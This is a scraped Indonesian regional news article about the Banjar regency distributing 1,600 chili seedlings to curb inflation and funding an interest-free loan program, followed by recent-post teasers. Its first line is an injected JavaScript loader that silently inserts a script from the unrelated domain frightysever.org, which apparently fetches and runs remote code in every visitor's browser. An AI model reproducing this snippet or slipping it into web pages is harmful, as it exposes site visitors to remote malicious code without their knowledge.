(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Tekan Inflasi, Pemkab Banjar Bagikan 1.600 Bibit Cabai Merah


KANALKALIMANTAN.COM, MARTAPURA – Pemerintah Kabupaten Banjar bersama TNI, Polri dan stakeholder terkait  melakukan langkah-langkah strategis guna menjaga ketersediaan pasokan bahan pangan dan keterjangkauan harga.

Hal itu dilakukan guna menekan angka iInflasi di Kalimantan Selatan masih di atas target nasional, termasuk di Kabupaten Banjar.

Hal tersebut diungkapkan Bupati Banjar H Saidi saat bertindak selaku pembina apel kerja gabungan lingkup Pemerintah Kabupaten Banjar, Senin (3/7/2023) pagi.

Salah satu langkah strategis yang akan dilaksanakan lanjut Saidi Mansyur adalah Pencanangan Gerakan Menanam dengan memberikan bibit tanaman cepat panen berupa cabai merah kepada masyarakat sebanyak 1.600 bibit.

Baca juga: Hakim Tolak Keberatan Tiga Terdakwa Kasus Korupsi Bendungan Tapin

“Semoga gerakan ini dapat meningkatkan suplai pangan dan membantu mengendalikan harga pangan, terutama komoditas cabai merah yang menjadi penyumbang inflasi di daerah kita,” harap Saidi.

Tahun ini, jelas dia, Pemkab Banjar juga melanjutkan Program Kredit Usaha Rakyat Martapura Maju, Mandiri dan Agamis (KURMA MANIS).

Program ini memberikan pinjaman tanpa bunga dan biaya administrasi kepada masyarakat pelaku usaha diberbagai sektor, seperti pertanian, perikanan, peternakan, perdagangan, industri kecil dan usaha lainnya.

“Pada tahun ini kami telah mengalokasikan dana sebesar 4,5 Miliar rupiah untuk mendukung program ini,” jelas Saidi.

Baca juga: Bupati Banjar Minra SKPD di Pemkab Banjar Lebih Eksplor Program

Kepada semua pihak, Saidi sampaikan terima kasih dan apresiasinya kepada yang terlibat dalam pelaksanaan Program KURMA MANIS, termasuk direksi dan jajaran PT BPR Martapura Banjar Sejahtera sebagai bank pelaksana program.

Di tempat yang sama, Saidi Mansyur juga melepas secara resmi kontingen Pramuka Kwarcab Banjar sebanyak 45 anggota pramuka penggalang putra dan putri yang akan mengikuti perkemahan bakti sosial yaitu Kemah Bela Negara Tingkat Nasional 8-16 Juli 2023 di Kiram, Kabupaten Banjar. (kanalkalimantan.com/diskominfobanjar/kk)

Reporter: kk
Editor: Dhani


Al Ghifari

Recent Posts

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

35 menit ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

1 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

2 jam ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

3 jam ago

Srikandi PLN UPT Palangkaraya Mengajar di SDN 5 Bukit Tunggal

KANALKALIMANTAN.COM, PALANGKARAYA – PT PLN (Persero) Unit Pelaksana Transmisi (UPT) Palangkaraya melalui gugus tugas Srikandi… Read More

5 jam ago

Pemkab HSU Gelar Peringatan Harkitnas

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan memimpin upacara peringatan… Read More

6 jam ago

This website uses cookies.